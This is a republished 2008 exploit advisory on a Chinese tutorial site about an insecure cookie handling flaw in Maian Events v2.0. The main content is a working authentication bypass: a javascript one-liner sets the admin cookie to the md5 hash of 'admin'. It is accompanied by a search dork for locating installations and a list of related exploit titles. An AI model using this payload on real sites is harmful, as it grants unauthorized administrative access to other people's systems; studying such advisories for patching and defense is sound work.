手机
当前位置:查字典教程网 >网络安全 >Exploit >Maian Events 2.0 Insecure Cookie Handling Vulnerability
Maian Events 2.0 Insecure Cookie Handling Vulnerability
摘要:Author:SaimeDate:July12,2008Script:MaianEventsv2.0InsecureCookieHandli...

Author: Saime

Date: July 12, 2008

Script: Maian Events v2.0 Insecure Cookie Handling Vulnerability

URL: http://www.maianscriptworld.co.uk

Dork: Maian Events v2.0 Copyright © 2005-2008 Maian Script World. All Rights Reserved

Description:

Maian Events v2.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mevents_admin_cookie,

equals admin username(md5)

Exploit:

javascript:document.cookie = "mevents_admin_cookie=21232f297a57a5a743894a0e4a801fc3; path=/"

Note:

The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin

【Maian Events 2.0 Insecure Cookie Handling Vulnerability】相关文章:

Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)

Maian Music 1.0 Insecure Cookie Handling Vulnerability

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

Maian Guestbook

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

CodeDB (list.php lang) Local File Inclusion Vulnerability

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

精品推荐
分类导航